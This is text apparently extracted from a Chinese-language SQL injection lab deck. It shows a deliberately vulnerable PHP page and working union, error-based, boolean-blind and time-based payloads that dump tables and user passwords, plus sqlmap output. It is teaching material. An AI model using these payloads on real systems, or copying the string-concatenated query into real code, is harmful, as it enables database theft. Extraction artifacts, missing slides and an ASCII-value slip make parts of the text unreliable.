透過簡單的攻擊範例,說明四種常見的 SQL Injection (Union Based Injection、Error Based Injection、Boolean Based Blind Injection、Time Based Blind Injection),並介紹一款常用的工具 sqlmap。
3. ⼀一個簡單的範例
• 登⼊入驗證的SQL查詢代碼
• strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and
(pw = '"+ passWord +"');"
• 惡意填⼊入
• userName = "1' OR '1'='1";
• passWord = "1' OR '1'='1";
• SQL查詢命令變成
• strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw =
'1' OR '1'='1');"
• strSQL = "SELECT * FROM users;" (result=true 無帳號密碼,亦可登⼊入網站)
4. SQL Injection Lab
• 實驗步驟
• 設定被攻擊系統
• Union Based Injection
• Error Based Injection
• Boolean Based Blind Injection
• Time Based Blind Injection
• 使⽤用 sqlmap 分析弱點
6. 新增資料庫
# mysql -uroot -pspy123 test < test.mysql
# mysql -uroot -pspy123 test -e "show tables"
+----------------+
| Tables_in_test |
+----------------+
| fruit |
| user |
+----------------+
# mysql -uroot -pspy123 test -e "select * from fruit"
+----+--------+
| ID | Name |
+----+--------+
| 1 | apple |
| 2 | banana |
| 3 | cherry |
| 4 | date |
+----+--------+
# mysql -uroot -pspy123 test -e "select * from user"
+----+------+------+
| ID | Name | Pass |
+----+------+------+
| 1 | aaa | 111 |
| 2 | bbb | 222 |
| 3 | ccc | 333 |
+----+------+------+
7. hackme.php (攻擊⺫⽬目標)
<?php
$id= $_GET["id"];
$link = mysql_connect('localhost', 'root', 'spy123');
if (!$link) die('Not connected : ' . mysql_error());
$db_selected = mysql_select_db('test', $link);
if (!$db_selected) die ('Can't use foo : ' . mysql_error());
$db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;";
echo $db_query . "<hr>";
$result = mysql_query($db_query);
if (!$result) die('Invalid query: ' . mysql_error());
while ($row = mysql_fetch_assoc($result)) {
echo "name: " . $row['Name'] . "<br>";
}
mysql_free_result($result);
?>
8. ⼩小試⾝身⼿手
• 正常查詢 (https://192.168.200.61/hackme.php?id=1)
• Input: 1
• Query: SELECT * FROM Test WHERE ID='1' LIMIT 0,1;
• Response: name: apple
• 測試 input query 是否使⽤用單引號 (SELECT * FROM Test WHERE ID='1' LIMIT 0,1;)
• input: 1 >> name: apple
• input: 1' >> Invalid query: You have an error in your SQL syntax...
• input: 1" >> name: apple
• input: 1' or '1'='1 >> name: apple
10. 技術描述
• 使⽤用 UNION 將另⼀一段 SELECT 指令加掛在正常輸⼊入
後⾯面,藉此窺探系統資訊。
• The attacker appends to the affected parameter a
syntactically valid SQL statement starting with an
UNION ALL SELECT.
11. 推測表格欄位數⺫⽬目
• 原 SQL Query 指令
• $db_query = "SELECT * FROM fruit WHERE
ID='$id' LIMIT 0,1;";
• SQL Injection 發現 fruit table 有兩個欄位
• $db_query = "SELECT * FROM fruit WHERE
ID='1' union select 1, 2-- -LIMIT 0,1;"; 被註解掉
12. 找出系統資訊
Target Input Response
資料庫名稱 -1' union select 1,database()-- - name: test
系統版本 -1' union select 1,version()-- - name: 5.5.33a-MariaDB
資料庫使⽤用者 -1' union select 1,user()-- - name: root@localhost
SELECT * FROM fruit WHERE ID='-1' union select 1,version()-- -' LIMIT 0,1;
13. 找出表格名稱
• Input
• -1' union select 1,table_name from information_schema.tables where
table_schema=database()--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' union select 1,table_name from
information_schema.tables where table_schema=database()-- '
LIMIT 0,1;
• Response
• name: fruit
• name: user
14. 找出欄位名稱
• Input
• -1' union Select 1,column_name from information_schema.columns where
table_schema=database() and table_name='user'--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' union Select 1,column_name from
information_schema.columns where table_schema=database() and
table_name='user'-- ' LIMIT 0,1;
• Response
• name: ID
• name: Name
• name: Pass
15. 找出表格資料
• Input
• -1' union Select 1,concat(ID,", ",Name,", ",Pass) from user--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' union Select 1,concat(ID,",
",Name,", ",Pass) from user-- ' LIMIT 0,1;
• Response
• name: 1, aaa, 111
• name: 2, bbb, 222
• name: 3, ccc, 333
17. 技術描述
• 傳遞不乾淨的輸⼊入引發資料庫錯誤,藉由產⽣生的錯誤
進⾏行窺探
• The attacker replaces or appends to the affected
parameter a database-specific error message
provoking statement and parses the HTTP
response headers and body in search of DBMS
error messages containing the injected pre-defined
chain of characters and the subquery statement
output within.
18. 找出當前資料庫名稱
• Input
• -1' and extractvalue(0x0a,concat(0x0a,(select database())))--
+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' and
extractvalue(0x0a,concat(0x0a,(select database())))-- '
LIMIT 0,1;
• Response
• Invalid query: XPATH syntax error: ' test'
19. 找出當前表格名稱
• Input
• -1' and extractvalue(0x0a,concat(0x0a,(select table_name from
information_schema.tables where table_schema=database() limit
0,1)))--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' and
extractvalue(0x0a,concat(0x0a,(select table_name from
information_schema.tables where table_schema=database() limit
0,1)))-- ' LIMIT 0,1;
• Response
• Invalid query: XPATH syntax error: ' fruit'
21. 技術描述
• 有時候系統沒有那麼多的漏洞,能讓你⽤用⽅方便的⽅方式得
到答案,只好跟被攻擊者玩 是/不是 (true/false) 的遊戲。
• 透過 substring(string_to_guess, N,1)=D 資料庫查詢指
令,猜測 string_to_guess 的第 N 個字元是否為 D (⼗十進
位表⽰示)
• The attacker replaces or appends to the affected
parameter in the HTTP request, a syntatically valid SQL
statement string containing a SELECT sub-statement,
or any other SQL statement whose the user want to
retrieve the output.
22.
23. 猜測資料庫版本
• 猜測主版本為 4
• Input:1' and substring(version(),1,1)=4--+
• SQL Query:SELECT * FROM fruit WHERE ID='1' and substring(version(),
1,1)=4-- ' LIMIT 0,1;
• Response:(沒輸出資料)
• 猜測主版本為 5
• Input:1' and substring(version(),1,1)=5--+
• SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(),
1,1)=5-- ' LIMIT 0,1;
• Response:name: apple
24. 猜測表格名稱
• Input
• 1' and ascii(substring((select concat(table_name) from
information_schema.tables where table_schema=database() limit 0,1),
1,1))>64--+
• SQL Query
• SELECT * FROM fruit WHERE ID='1' and ascii(substring((select
concat(table_name) from information_schema.tables where
table_schema=database() limit 0,1),1,1))>64-- ' LIMIT 0,1;
• Steps
• >64 (有反應); >112 (無反應); >95 (有反應); >110 (無反應); >103 (無反應);
>100 (有反應); >102 (無反應); >101 (有反應); =102 (有反應)
• 表格第⼀一個字: “f" (⼗十進位=102),重複以上步驟猜出表格名稱: "fruit"
25. 猜測欄位名稱
• 猜 fruit table 第⼀一個欄位名稱的字⺟母
• 1' and ascii(substring((select concat(column_name)
from information_schema.columns where
table_name="fruit" limit 0,1),1,1))=73--+
• 1' and ascii(substring((select concat(column_name)
from information_schema.columns where
table_name="fruit" limit 0,1),2,1))=68--+
• fruit 表格第⼀一個欄位名稱: "ID" (⼗十進位=73, 68)
26. 猜測欄位資料
• 表格(fruit) 第⼆二筆資料 欄位 (Name) 的值
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),1,1))=98--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),2,1))=97--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),3,1))=110--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),4,1))=97--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),5,1))=110--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),6,1))=97--+
• 欄位值: “banana” (⼗十進位=98, 97, 100, 97, 110, 97)
28. 技術描述
• 更糟的情形是⺫⽬目標連 是/不是 (true/false) 的遊戲都不
跟你玩,只能透過延遲時間的⽅方式窺探系統資訊。
• Time-based techniques are often used to achieve
tests when there is no other way to retrieve
information from the database server. This kind of
attack injects a SQL segment which contains
specific DBMS function or heavy query that
generates a time delay.
29. 猜出 SQL Query 的⽅方式
• 註解⽅方式: --+
• SQL Query: SELECT * FROM fruit WHERE ID=‘1’
33. Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5529=5529 AND 'vZzG'='vZzG
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 9346 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT
(ELT(9346=9346,1))),0x71766b7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHGd'='eHGd
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))VcYN) AND 'yLgG'='yLgG
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT
NULL,CONCAT(0x71626a6a71,0x78576371715058656452616346686d506c666643427a52514775
456778504d50744e504951505a54,0x71766b7871)-- -